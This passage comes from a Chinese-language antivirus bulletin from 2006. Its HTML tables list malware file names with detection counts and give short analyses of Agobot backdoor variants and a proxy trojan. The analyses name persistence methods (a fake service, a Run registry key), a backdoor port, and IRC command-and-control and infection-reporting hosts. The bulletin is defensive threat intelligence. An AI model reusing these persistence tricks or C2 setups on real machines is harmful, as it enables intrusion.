<DIV><FONT face=宋体><SPAN><SPAN id=L025DC10021188E8A title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">149</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L030060402418EECD><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L030060C027194F90 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L030061002A19B093 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">130</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L0300A0402D1A50D6><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0300A0C0301AF199 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">wuass32.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0300A100331B929C title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">93</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L0300E040361C72DF><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L0300E0C0391D53A2 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssm32.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L0300E1003C1E34A5 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">86</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 118px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><br />
<DIV><FONT face=Arial><STRONG>技术分析</STRONG></FONT></DIV><SPAN><SPAN id=L025D08200E2E2332 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L025D08A0108B2BD5><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L025D08E012E834B8 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">icntrl.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L025D092015453DDB title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L025D09A017A2477E title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、大小220K~240K左右，是个高波病毒变种。运行后，建立下面文件：</DIV><br />
<DIV>%SystemDir%\icntrl.exe</DIV><br />
<DIV>创建服务：NtDIC，服务描述：Nt network domain internet connectivity checker.</DIV><br />
<DIV>服务程序指向icntrl.exe。这样病毒可以随Windows系统自动启动。</DIV><br />
<DIV> </DIV><br />
<DIV>2、通过多种系统漏洞传播，在传播过程中，会扫描局域网内的计算机，发送大量数据包，造成中毒计算机CPU占用率很高，局域网拥堵。</DIV><br />
<DIV> </DIV><br />
<DIV>3、连接IRC服务器frayedendsofsanity.be接收并执行黑客命令。</DIV><br />
<DIV> </DIV><br />
<DIV>botnet:</DIV><br />
<DIV>frayedendsofsanity.be:5599</DIV><br />
<DIV>##meth metal</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L0301A040628A572C title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L0301A0C0658BF7EF><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L0301A100688D98F2 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0301A1406B8F3A35 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</SPAN></SPAN></TD></TR><br />
<TR id=L0301E04076F11521><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L0301E08079F2F5A4 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssvcc.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L0301E0C07CF4D667 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L0301A1C06E90DBF8 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>这2个是高波的变种，请参考昨日病毒（2006.03.16-03.17）和昨日病毒（3月13日）</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L011600407E0AD6AA title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L011600C07F20D76D><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L011601008036D870 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">mssm32.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L01160140814CD9B3 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">TrojanProxy.Agent</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L011601C08262DB76 title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\mssm32.exe, 21253字节<BR>在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;Microsoft (R) Windows Security Manager&#8221; = %SystemDir%\mssm32.exe<BR>这样，在Windows启动时，病毒就可以自动执行。</DIV><br />
<DIV> </DIV><br />
<DIV>2、打开后门代理TCP端口24027，可供黑客远程使用，作为跳板，进行黑客行为。</DIV><br />
<DIV> </DIV><br />
<DIV>3、感染计算机后，向sophos.inlandloan.com发送UPD包，报告感染信息。</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L011644A083792019 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L01164BE0848F6BFC><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L0116558085A5C17F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">wuass32.exe</SPAN></SPAN></TD><br />
